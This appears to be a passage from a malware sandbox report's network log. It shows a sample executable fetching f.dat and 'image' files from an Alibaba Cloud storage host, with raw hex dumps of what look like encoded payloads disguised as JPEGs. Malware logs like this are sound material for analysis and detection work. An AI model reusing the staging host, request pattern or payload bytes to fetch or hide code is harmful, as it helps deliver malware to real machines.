2025-01-01 07:31:11 UTC	4096	IN	Data Raw: 72 b8 f8 65 fd f3 08 c8 16 67 54 0d cf 0b 6c 41 02 c8 a0 55 06 c4 14 75 72 5c ea 55 d3 97 57 dd f2 5b 5c 5d 16 d4 24 45 4a 6c da 65 e3 a7 67 ed f2 6b 6c 6d 26 e4 34 55 52 7c ca 75 f5 8f 39 05 67 33 f7 39 5a 5f 8f 3f 82 00 7c df f9 97 c0 02 ce af ac 82 30 8f 13 59 b2 1a 90 b1 7d 9c d0 12 de bf bc 92 20 9f 29 a5 86 eb 2f e1 82 8f a7 17 aa 28 54 ec d2 b1 f8 3a f6 97 9c ba 08 b7 3b 41 e0 c4 ad f5 35 fb e4 e9 cd 7d c4 46 0e e7 41 8d ee cf 27 c1 86 44 94 f5 fa dc 6a d5 5f 93 fc dd d5 6d d8 f9 d1 69 ac c5 e6 d8 25 90 f9 af 63 ad ce cb a4 12 2e a7 79 b5 d6 d3 bc 7e b2 d3 d0 b1 05 3b b4 74 ba db 28 e8 4a fc fb fa 4e 8c 4c 2d 2a 04 b2 0d 8d f7 51 6d 0c 5b 9f 51 32 37 17 a7 1a 98 e4 47 61 0e 68 aa 66 07 04 2a 98 27 ab e1 0a a2 68 09 26 c4 3c 79 b9 77 10 15 39 89 38 Data Ascii: regTlAUur\UW[\]$EJlegklm&4UR\|u9g39Z_?\|0Y} )/(T:;A5}FA'Dj_mi%c.y~;t(JNL-Qm[Q27Gahf'h&<yw98
2025-01-01 07:31:11 UTC	4096	IN	Data Raw: 8a 3b 3c 3d ae 77 c1 85 4a 42 44 45 85 8b 84 85 86 87 80 81 82 83 18 d0 be db 56 55 56 91 1c 7d 2a 68 9a 19 7a 2e 56 a7 26 47 16 55 a0 23 4c 1a 1e ad 28 49 1a 1d b6 35 56 06 15 b3 32 53 0e 00 bc 3f 58 0a 50 b9 c4 a5 fa e6 42 c1 a2 fe f0 4f ce af f6 e8 48 cb b4 ea 92 55 d0 b1 d6 a4 5e dd be da aa 5b da bb e2 91 64 e7 80 e6 d5 61 ec 8d ee cf 6a e9 8a ea 9e 77 f6 97 f2 d0 70 f3 9c fe c2 7d f8 99 f6 da 06 85 e6 8a c4 03 42 e3 48 c9 ca cb ff 0b 4a eb 51 d1 d2 d3 e2 13 52 f3 5a d9 da db ec 1b 5a fb 63 e1 e2 e3 97 23 62 c3 6c e9 ea eb 8d 2b 6a cb 75 f1 f2 f3 92 33 72 d3 7e f9 fa fb 99 3b 7a db 87 01 02 03 2a c3 82 23 80 09 0a 0b 69 cb 8a 2b 99 11 12 13 6c d3 92 33 92 19 1a 1b 79 db 9a 3b ab 21 22 23 24 e3 62 03 08 42 ec 6f 08 0c 4b e9 74 15 10 41 f2 71 12 14 56 Data Ascii: ;<=wJBDEVUV}hz.V&GU#L(I5V2S?XPBOHU^[dajwp}BHJQRZZc#bl+ju3r~;z#i+l3y;!"#$bBoKtAqV
2025-01-01 07:31:11 UTC	4096	IN	Data Raw: 3e 1f 74 b6 72 1b 60 09 41 8b 0c ce 87 0f c3 45 6e 03 c7 19 6a 67 18 52 83 1b df 9f 59 e1 51 d1 52 b0 f0 15 d5 5b 44 29 e9 2f 40 45 2e 64 a0 21 e1 aa aa 6d 6e 27 fb 35 56 53 3c f6 b2 6f bb b5 b6 b7 b0 b1 b2 b3 c8 08 d6 a7 94 cd 0f cb ac 81 c2 08 60 95 c6 04 d4 b5 b2 db 1d 91 b2 df 13 dd be b3 d4 14 da bb a8 e9 29 a7 80 aa 18 a7 2d 69 de a6 e4 26 aa 8b f8 4e 72 fb 3d b1 92 5c 50 f1 31 bf 98 f5 35 f3 e4 c9 cd 75 cd 4d ce 8f 43 cd ee 83 33 0d 86 46 d4 f5 9a 58 90 f1 de 9f 27 19 92 52 98 f9 d6 97 6b a5 c6 eb eb 5b e6 62 28 9c 24 a3 67 e9 ca 29 f0 f1 ba 78 b0 d1 d6 bf 7b 3d e2 38 30 31 32 33 44 88 46 27 1c 4d 8f 53 2c 19 42 82 40 29 06 47 93 fd 3a 5b 9f 51 32 2f 50 90 5e 3f 0c 55 95 5b 04 11 6a aa 60 01 2e ac 6c 0d 6a a2 28 09 a5 6b 14 71 cd fb bd 71 12 77 bb Data Ascii: >tr`AEnjgRYQR[D)/@E.d!mn'5VS<o`)-i&Nr=\P15uMC3FX'Rk[b($g)x{=80123DF'MS,B@)G:[Q2/P^?U[j`.lj(kqqw
2025-01-01 07:31:11 UTC	4096	IN	Data Raw: 1e 63 74 b0 aa 1b c8 41 42 43 0c c8 4b e2 8d b6 b5 a3 1c 82 b1 b0 18 d8 16 77 34 1d 91 13 7c 69 5a 5b 5c 5d 99 1b 44 49 e2 63 64 65 a1 23 4c 49 68 6b 6c 6d 2b 5c b9 34 41 b3 ce 75 76 77 38 31 f1 f7 58 cd 7e 7f 80 7e d6 a7 d4 cd 0f c3 ac c1 c2 08 f0 a9 c6 70 e4 a0 da 54 d0 b1 b6 97 98 99 9a d7 11 d1 ba df e4 2a 26 87 64 a5 a6 a7 e0 22 3e 8f 14 ad ae af f8 3a fe 97 fc 4a e2 93 e0 f1 31 f7 98 f5 41 eb e4 a1 52 8b 45 01 6e c7 c8 c9 09 07 00 01 02 03 98 58 9e f7 dc 9d 55 3b f0 91 51 9f f8 ed 96 56 a4 c5 f2 ab 23 e1 c2 18 17 16 15 a3 13 e9 ca a7 7b b5 d6 e3 bc 7e fa d3 78 c5 f2 fb 89 10 b6 74 04 25 4a 8a 40 21 0e 4f 8b 75 2e 03 0c 78 0c e4 3d 59 99 57 30 1d 5e 9c 54 3d 2a 53 1f d5 56 94 e1 2e 9c 63 db a6 de 7b 5d 3d 62 a0 68 09 26 67 bb 7d 16 03 7c 36 fe 7f b3 Data Ascii: ctABCKw4\|iZ[\]DIcde#LIhklm+\4Auvw81X~~pT&d">:J1AREnXU;QV#{~xt%J@!Ou.x=YW0^T=SV.c{]=bh&g}\|6
2025-01-01 07:31:11 UTC	4096	IN	Data Raw: 1e 03 74 be fe 27 01 f9 46 43 44 45 0e cc 98 01 c7 c7 68 a5 4e 4f 50 b9 f8 b3 ab aa 1e dc 1c 7d 62 13 df 9d 42 1e d8 69 62 63 64 2d ed b7 20 e2 e6 4f 7c 6c 6e 6f 98 fa 92 8c 8b 3d fd f3 5c 19 7b 7b 7c 35 f5 f3 a4 c9 83 83 84 cd 0f 8f c0 02 0e af ec 8c 8e 8f 1b 1d b6 77 94 95 96 1e d0 91 d2 10 18 b9 fe 9e a0 a1 ea 28 28 81 a6 a6 a8 a9 e2 22 e4 bd e6 24 34 95 d2 b2 b4 b5 3d 3b 9c 51 ba bb bc 34 f6 a7 88 4a 46 e7 a4 c4 c6 c7 80 42 46 ef dc cc ce cf 98 58 9a f3 9c 5e 52 f3 b8 d8 da db 94 5c 1a 87 e1 e1 e2 20 28 29 2a 2b 24 25 26 27 20 21 22 23 b8 78 be d7 fc bd 7d b3 dc f1 b2 70 fc b5 3f 1f 15 49 89 4f 20 0d 4e 8c 01 41 39 c3 44 86 cf 47 9b 5d 36 1b 5c 9c 17 5f 93 5d 3e 13 54 96 1e 57 e1 c9 01 6b af 69 02 2f 60 a2 23 63 1f e5 66 a4 f1 79 b9 7f 10 3d 7e be 39 Data Ascii: t'FCDEhNOP}bBibcd- O\|lno=\{{\|5w(("$4=;Q4JFBFX^R\ ()*+$%&' !"#x}p?IO NA9DG]6\_]>TWki/`#cfy=~9
2025-01-01 07:31:11 UTC	4096	IN	Data Raw: 3a 5e fa b9 1a 89 40 41 42 20 82 c1 62 f0 48 49 4a 3f 8a c9 6a f7 50 51 52 3c 92 d1 72 ee 58 59 5a 29 9a d9 7a e5 60 61 62 1a a2 e1 42 dc 68 69 6a 2a aa e9 4a d3 70 71 72 73 3c f8 e2 53 d0 79 7a 7b 34 f0 73 12 25 7e 7d 6b 9c 2a 79 78 c0 00 0e af a4 8f 8e 8f d8 1c 1e b7 c4 a7 96 97 67 0d be b3 9e 9d 9e d7 2d 2d 86 ff 91 a5 a6 4f 1c a4 aa ab e4 20 22 8b d0 87 b2 b3 5c 12 bb b7 b8 f1 37 37 98 d9 89 bf c0 29 58 ce c4 c5 8e 4a 44 ed a2 f3 cc cd 26 42 dd d1 d2 9b 59 59 f2 8b ed d9 da 33 2c d4 de df 26 65 c6 63 e4 e5 e6 a0 2e 6d ce 6a ec ed ee 8a 36 75 d6 71 f4 f5 f6 83 3e 7d de 78 fc fd fe af c6 85 26 87 04 05 06 75 ce 8d 2e 8e 0c 0d 0e 60 d6 95 36 95 14 15 16 74 de 9d 3e 9c 1c 1d 1e 7a e6 a5 06 ab 24 25 26 54 ee ad 0e a2 2c 2d 2e 5c f6 b5 16 b9 34 35 36 7f fe Data Ascii: :^@AB bHIJ?jPQR<rXYZ)z`abBhijJpqrs<Syz{4s%~}kyxg--O "\77)XJD&BYY3,&ec.mj6uq>}x&u.`6t>z$%&T,-.\456
2025-01-01 07:31:11 UTC	955	IN	Data Raw: 66 1f 34 70 0d e4 0c cc 16 67 5c 09 6d 97 05 46 08 98 29 01 c5 53 75 41 52 53 54 18 6d 84 2b 4f 3c 1a dd bf 5e af 2d ec f9 63 94 9a 99 26 ae 6a 6a 26 57 be 1b 9f 3c fa 66 57 38 fe 2a 53 70 31 f9 bf 6c be b2 b3 81 86 80 83 83 84 af 87 89 80 8b 8b 85 af 8e 8f 91 9c 93 93 99 d7 96 97 99 94 9b 9b 91 5f 9e 9f a1 ab a1 a3 ae 67 a0 d7 ad c9 aa ab ad a3 af af be 13 b2 b3 b5 bb b7 b7 b6 9b ba bb bd b1 bc bf cc c0 ff c3 c5 c2 c4 c7 cf c8 dd cb cd c4 cf cf d9 13 d2 d3 d5 d1 d7 d7 dc 3b da db dd d9 df df e4 23 e2 e3 e5 ee e4 e7 e3 e8 cb eb ed ea ec ef f7 f0 a3 f3 f5 e4 f4 f7 e9 f8 df fb fd f0 ff ff 0d 63 02 03 05 02 04 07 0f 08 21 0b 0d 09 0f 0f 14 b3 12 13 15 06 17 17 0b 3b 1a 1b 1d 0e 1f 1f 33 63 22 23 25 2b 27 27 26 6b 2a 2b 2d 23 2f 2f 3e 53 32 33 35 2d 37 37 20 Data Ascii: f4pg\mF)SuARSTm+O<^-c&jj&W<fW8Sp1l_g;#c!;3c"#%+''&k+-#//>S235-77

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49888	118.178.60.9	443	8184	C:\Users\user\Documents\qWXt7a.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 07:31:13 UTC	110	OUT	GET /f.dat HTTP/1.1 User-Agent: GetData Host: 22mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
2025-01-01 07:31:14 UTC	558	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Wed, 01 Jan 2025 07:31:14 GMT Content-Type: application/octet-stream Content-Length: 879 Connection: close x-oss-request-id: 6774EF423D53853430234A39 Accept-Ranges: bytes ETag: "E54C4296F011EC91D935AA353C936E34" Last-Modified: Tue, 22 Oct 2024 18:02:54 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 11142793972884948456 x-oss-storage-class: Standard x-oss-ec: 0048-00000113 Content-Disposition: attachment x-oss-force-download: true Content-MD5: 5UxClvAR7JHZNao1PJNuNA== x-oss-server-time: 1
2025-01-01 07:31:14 UTC	879	IN	Data Raw: 0f 56 0e 57 66 34 65 31 31 31 31 31 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 Data Ascii: VWf4e111111111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW111

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49903	118.178.60.9	443	8184	C:\Users\user\Documents\qWXt7a.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 07:31:15 UTC	115	OUT	GET /FOM-50.jpg HTTP/1.1 User-Agent: GetData Host: 22mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
2025-01-01 07:31:16 UTC	546	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Wed, 01 Jan 2025 07:31:16 GMT Content-Type: image/jpeg Content-Length: 55085 Connection: close x-oss-request-id: 6774EF44A7BABC3832053739 Accept-Ranges: bytes ETag: "DC44AE348E6A74B3A74871020FDFAC74" Last-Modified: Tue, 22 Oct 2024 14:47:46 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 12339968747348072397 x-oss-storage-class: Standard x-oss-ec: 0048-00000105 Content-Disposition: attachment x-oss-force-download: true Content-MD5: 3ESuNI5qdLOnSHECD9+sdA== x-oss-server-time: 1
2025-01-01 07:31:16 UTC	3550	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 Data Ascii: JFIFZExifMM*JQQ%Q%CC
2025-01-01 07:31:16 UTC	4096	IN	Data Raw: 7c 7b dc 41 c2 74 77 75 74 73 65 91 8f 90 91 11 ee 84 95 e3 bf 11 84 3e 34 dc 9d f4 97 48 c7 b1 a3 a4 fc 59 d2 a0 41 56 56 53 52 9d 74 f3 32 cf a3 b4 c1 be dd b0 51 f7 a8 bc bd e7 7c 28 d0 d2 c3 c4 06 4d 38 9d 42 26 a1 cc a7 ce 30 a5 d9 3a 10 2a 2a 29 54 1c d5 87 18 57 22 8b 54 0c 8b e2 89 e5 1a 93 ef 00 44 14 14 13 6e 2a e3 ad 32 98 f2 9e f5 9c f7 10 64 04 04 03 7e 3a f3 c3 6b 03 69 05 6f 06 ef 86 f7 f5 f4 8f c9 02 cc 9b ee 44 fb 09 1f 16 17 93 e9 4c f3 1d 06 1e 1f 76 c9 ae 39 24 25 70 cf c4 3a 2a 2b 7a c5 5f 35 30 31 64 db 68 2f 36 37 6e d1 7e 23 3c 3d 68 d7 be 40 42 43 12 ad 48 55 48 49 22 dc 5a 0d 4e a7 3f 58 52 53 d7 91 72 f4 54 f9 1a 5b 02 9e d5 a0 35 ea 8e 32 35 36 ed 3a 60 3f 3d 58 9a 5e 91 e6 0d 8d 49 6f 89 65 d6 37 78 0d 73 3c f5 00 82 fc 7f 96 Data Ascii: \|{Atwutse>4HYAVVSRt2Q\|(M8B&0:*)TW"TDn2d~:kioDLv9$%p:*+z_501dh/67n~#<=h@BCHUHI"ZN?XRSrT[5256:`?=X^Ioe7xs<
2025-01-01 07:31:16 UTC	4096	IN	Data Raw: 81 d9 46 b5 47 c8 2a 32 3c cc 8d d3 4c 5c f9 22 b5 d4 95 f2 68 ad 99 9a 9b 9c 16 da bb b0 28 ce 87 b4 28 ca 83 b8 82 4a f8 fa fa 0f ab 10 f1 b2 82 f1 49 85 72 e8 30 df 53 43 c8 46 34 85 3d 05 86 38 3b 39 38 37 40 8f 33 41 88 3e ab 73 d1 d2 d3 d4 16 5d 9a 28 bd 53 d6 dc dd de df b9 be bd bd bf 6e 03 ba b9 2a 26 27 20 21 22 23 3c 3d 3e 3f 38 7e 09 a2 73 15 79 17 e4 ae 75 a2 0c 57 89 70 0c 36 33 03 a8 49 0a 5c 87 0b c8 4a ef 11 d5 56 e0 14 16 17 18 94 61 0b 9f e5 e0 6b 2d aa 6c 27 27 ea 15 2b 10 c1 c9 c2 d3 d2 a5 61 3c ba 74 3b 37 fa 05 3b 00 d1 e9 d2 c3 c2 b5 7a 48 b7 02 47 22 4a c3 51 49 49 4a c0 01 5d c3 1a b8 d8 01 af df 0e 5a de 1d b1 d3 16 b0 de a5 a1 14 3e ef 2a 64 e8 62 3c e3 25 ec 7f e1 29 e8 7f f9 34 82 f8 74 fc 33 8f fd b0 0e 6f f7 aa 96 23 aa 81 Data Ascii: FG2<L\"h((JIr0SCF4=8;987@3A>s](Sn&' !"#<=>?8~syuWp63I\JVak-l''+a<t;7;zHG"JQIIJ]Z>*db<%)4t3o#
2025-01-01 07:31:16 UTC	4096	IN	Data Raw: b4 7b f0 8e 6c 82 e3 8e 63 f7 7e 71 70 c9 52 c4 f9 94 6a a3 4b 2c d9 9a 64 89 3d 1e df a0 24 62 d6 b2 4d ab 51 57 56 21 5b 53 b8 a6 2f f0 b1 e2 5b 09 40 49 48 31 bf e3 53 aa 4d 41 40 03 4a 3d 96 4f 29 4d 92 c0 9a 9c 9c ff 32 f5 18 a4 d6 59 8e d8 ee 09 a0 c6 31 03 2e 23 22 b4 c9 be 68 d2 b4 b3 b2 b1 b0 00 8b 1f 14 13 6e 2a fb 7b 37 ad ad af a8 35 7c 8d e9 c1 0c 89 fa cd 3f 66 88 00 e8 d0 8e cc 08 bf 0f 6c 82 0d 4c 4f 49 56 77 29 d4 60 16 5d 62 f6 2a da 20 c3 68 cd 79 a9 23 ca b3 d1 da d9 4d 0a 70 a3 23 a7 dc c5 9c bb ce 67 b8 d8 63 61 04 ce c6 4f 33 d4 84 23 3f 40 ca ba 1a c1 ba 33 60 71 4c 36 fd 0c 4d 38 50 06 ae 47 1f d4 15 56 da de b1 59 5b 5c 66 5b 23 d6 21 62 15 67 e6 ae 98 e3 99 e9 93 93 18 a4 e4 b7 2e 2c 2e b7 fe 89 22 f3 95 2c 2c 4f 8b 14 7f 7f f4 Data Ascii: {lc~qpRjK,d=$bMQWV![S/[@IH1SMA@J=O)M2Y1.#"hn{75\|?flLOIVw)`]b hy#Mp#gcaO3#?@3`qL6M8PGVY[\f[#!bg.,.",,O
2025-01-01 07:31:16 UTC	4096	IN	Data Raw: 82 84 85 0f ca 78 02 84 c2 05 c0 72 79 51 90 9d 16 47 97 96 97 cb 14 86 aa 17 8e 17 ca 54 2a f4 5f 2d f0 5e 2c fd 5d 23 f6 a0 5b 6c ae c5 c5 73 49 b0 ff 35 4d 87 cf b9 d1 83 e7 35 f4 c4 fa 89 cb b1 87 7d c7 c8 c9 4a 48 36 ed bd d6 5b 1b 01 38 59 99 d4 d3 2f 0a fb 87 64 99 20 d6 95 c2 69 ae ec c4 ff 0c f4 64 a0 0b 3f 06 63 a3 f2 f5 05 20 d5 69 4e 33 f8 f9 fa 05 f5 88 f8 74 4d 09 23 5a 00 8e 5b 0b 83 5a 02 80 57 09 85 42 ec 12 5f e7 9d 4f 12 9c 4d 15 91 41 18 96 4c 17 a9 72 2a aa 69 d9 ad f6 e9 d3 2e 61 af d7 11 59 33 5b 0d 69 bf 68 ce b4 db 38 b3 66 c8 32 bb b0 40 41 42 68 31 bd cd 1a b0 88 b1 4f 26 72 c7 3a 5c 1a 0c 68 8a 23 54 dc 86 5a 17 a3 d7 8c 9f a5 64 2b eb 2e 98 5e b0 11 6a e2 bc 50 b6 19 30 e4 3d 7d f9 02 70 4e 07 7f 0d 42 c4 7b 7c 7d fe fc 7b a1 Data Ascii: xryQGT_-^,]#[lsI5M5}JH6[8Y/d id?c iN3tM#Z[ZWB_OMALri.aY3[ih8f2@ABh1O&r:\h#TZd+.^jP0=}pNB{\|}{
2025-01-01 07:31:16 UTC	4096	IN	Data Raw: 96 50 05 c6 87 03 51 b1 54 f9 c1 b7 b2 40 27 d2 93 e0 a6 c0 7f 0c 42 65 64 c5 18 5e 90 25 d3 5d 5c 5b 2e e3 b7 93 6e a5 2f fc 52 51 50 77 b1 be b3 b4 b5 5f f2 47 46 45 88 43 36 cb b3 aa c5 2a 87 17 3a 39 9e 0b f2 15 be c1 46 8b df eb 16 a6 d5 13 d5 da d7 d8 d9 51 18 34 28 11 20 1f 22 88 f3 8c ad 70 a7 e8 01 49 24 13 12 65 b2 f8 74 29 86 fa 0a 83 fb 10 04 07 04 03 a4 17 33 01 01 02 88 71 09 83 f1 7d 05 59 e3 2f d2 f1 f0 49 f8 a5 12 14 15 95 2a a0 ae 5a 1b 1f 12 9b 8c 21 21 22 10 db ac 5b c3 ab d7 ca 24 ab a7 2f 2f 30 5b 36 db 99 e6 c9 c8 61 b0 47 c7 6f d5 d9 d1 bf be 1b ca 01 a5 7d 80 47 cd d4 4b 4c 4d 75 7a f0 e6 12 53 23 1c 00 04 08 b1 93 a8 a3 a2 dd 9b 6c e4 a2 17 61 ec 3b 83 83 5c 3c 83 f4 9b 91 90 29 f8 37 97 4f b2 02 50 f3 3a 86 33 47 bb 0c 7d 0b 47 Data Ascii: PQT@'Bed^%]\[.n/RQPw_GFEC6:9FQ4( "pI$et)3q}Y/IZ!!"[$//0[6aGo}GKLMuzS#la;\<)7OP:3G}G
2025-01-01 07:31:16 UTC	4096	IN	Data Raw: 8e 79 76 23 7b 77 ad 1f fb eb cd 8e 04 6f 66 4b 6c b0 18 b6 f0 d8 99 17 d2 9c 16 59 25 a3 a1 a2 a3 27 5c a2 d5 a4 2a 4a a8 87 65 51 8b 35 c5 d4 f3 b4 4a 92 3a c8 de fa bb 2c 39 d8 ff c0 69 a4 83 c4 15 a0 87 c8 43 8c c8 ef 1c 46 88 d3 52 3c d2 15 3c d4 54 37 d8 59 22 d4 af 6c 22 13 44 1e 1c c0 70 96 80 a8 e9 67 a2 ec 67 a8 ec d3 20 7a b4 f7 7f b0 f5 39 10 f8 73 bb ff 7d 11 02 82 ed 01 87 fc 0e 75 80 f4 f9 ae f0 f2 2a 9a 60 76 52 13 84 9f 50 14 3b c8 92 5c 1f 97 58 1d a8 66 20 a9 62 24 e7 ce 2a a1 6d 2a af c3 2d ac df 32 b1 ca 3c 3a b4 61 c7 c6 c5 c6 cf 98 c2 c0 64 d4 32 24 04 45 cb 0e 48 6d 2d 0b 4c 61 29 0f 50 65 35 13 54 69 31 17 58 1d 3d 1b 5c 11 39 1f 60 35 05 23 64 02 01 27 68 e2 2e e5 70 e4 2a e0 6c fa 36 fd 6c fc 32 f8 60 f2 3e f5 68 f4 3a f0 94 0a Data Ascii: yv#{wofKlY%'\JeQ5J:,9iCFR<<T7Y"l"Dpgg z9s}u`vRP;\Xf b$m-2<:ad2$EHm-La)Pe5Ti1X=\9`5#d'h.p*l6l2`>h:
2025-01-01 07:31:16 UTC	4096	IN	Data Raw: ed e5 e7 ea e2 a8 fd e5 ab e5 e3 e7 fb f9 f0 fe fa ee f0 b6 ff fd f8 ea 96 96 9d 9e 9f a0 f3 94 93 96 92 ab ad 85 89 c4 c4 d8 8d cb c1 df c4 d5 db 94 c6 c6 d6 db dc 9a dd d3 cf 9e d3 af b6 ab ac e4 ac a8 ae bc a0 ab a7 a5 b7 af bb b9 be bc de de d5 d6 d7 d8 8b ec eb ee eb d3 d5 cd c1 8c 8c 90 c5 83 89 87 9c 8d 83 cc 9e 9e 8e 93 94 d2 95 9b 87 d6 84 8c 9d 93 94 dc 94 90 96 74 68 63 6f 6d 7f 67 73 61 66 64 06 06 0d 0e 0f 10 43 24 23 26 20 1b 1d 35 39 6a 6e 6e 78 3e 69 49 53 56 56 45 49 06 41 5d 47 49 5f 45 42 40 0f 53 50 5e 5f 39 3f 36 37 38 6b 0c 0b 0e 09 33 35 6d 61 2c 2c 30 65 23 29 27 3c 2d 23 6c 3e 3e 2e 33 34 72 35 3b 27 76 08 37 37 3f 23 35 29 71 3e 14 04 1a 0a 10 45 12 06 0a 05 0f 66 66 6d 6e 6f 70 23 44 43 45 4c 7b 7d 55 59 0f 15 1d 1f 12 1a a0 f5 Data Ascii: thcomgsafdC$#& 59jnnx>iISVVEIA]GI_EB@SP^_9?678k35ma,,0e#)'<-#l>>.34r5;'v77?#5)q>Effmnop#DCEL{}UY
2025-01-01 07:31:16 UTC	4096	IN	Data Raw: 83 84 09 79 78 77 89 8a 8b 8c 73 71 70 6f 8a b2 d3 94 8a b6 d7 98 99 9a 9b 9c 63 61 60 5f a1 a2 a3 a4 71 59 58 57 a9 aa ab ac 53 51 50 4f b1 b2 b3 b4 01 94 f7 b8 47 45 44 43 bd be bf c0 02 e0 83 c4 3b 39 38 37 c9 ca cb cc 15 31 30 2f d1 d2 d3 d4 2b 29 28 27 d9 da db dc ab fa 9f e0 1f 1d 1c 1b e5 e6 e7 e8 6b ce ab ec 13 11 10 0f f1 f2 f3 f4 2d 09 08 07 f9 fa fb fc 03 01 00 ff fb 2a 43 04 fb 2e 47 08 09 0a 0b 0c f3 f1 f0 ef 11 12 13 14 c1 e9 e8 e7 19 1a 1b 1c e3 e1 e0 df 21 22 23 24 b2 0c 67 28 29 2a 2b 2c d3 d1 d0 cf 31 32 33 34 e1 c9 c8 c7 39 3a 3b 3c c3 c1 c0 bf 41 42 43 44 e3 6b 07 48 49 4a 4b 4c b3 b1 b0 af 51 52 53 54 8d a9 a8 a7 59 5a 5b 5c a3 a1 a0 9f 6a 4d 23 64 7a 49 27 68 69 6a 6b 6c 93 91 90 8f 71 72 73 74 b5 89 88 87 79 7a 7b 7c 83 81 80 7f 81 Data Ascii: yxwsqpoca`_qYXWSQPOGEDC;98710/+)('k-C.G!"#$g()+,12349:;<ABCDkHIJKLQRSTYZ[\jM#dzI'hijklqrstyz{\|
2025-01-01 07:31:16 UTC	4096	IN	Data Raw: ea ee ee ea ea e6 e6 fa fa fe fe fa fa e6 e6 ea ea ee 95 96 97 98 99 9a da de de da da e6 e6 ea ea ee ee ea ea e6 e6 fa fa fe fe fa fa e6 e6 ea ea ee b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7 f8 f9 fa fb fc fd fe ff 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f 40 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 5b 5c 5d 5e 5f 60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 7b 7c 7d 7e 6f 90 91 Data Ascii: !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{\|}~o

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49914	118.178.60.9	443	8184	C:\Users\user\Documents\qWXt7a.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-01 07:31:17 UTC	115	OUT	GET /FOM-51.jpg HTTP/1.1 User-Agent: GetData Host: 22mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
2025-01-01 07:31:18 UTC	547	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Wed, 01 Jan 2025 07:31:17 GMT Content-Type: image/jpeg Content-Length: 4859125 Connection: close x-oss-request-id: 6774EF453D53853331065B39 Accept-Ranges: bytes ETag: "EE6CA3EEA7F9B1C81059AEF570A28C02" Last-Modified: Tue, 22 Oct 2024 14:48:26 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 9060732723227198118 x-oss-storage-class: Standard x-oss-ec: 0048-00000105 Content-Disposition: attachment x-oss-force-download: true Content-MD5: 7myj7qf5scgQWa71cKKMAg== x-oss-server-time: 2
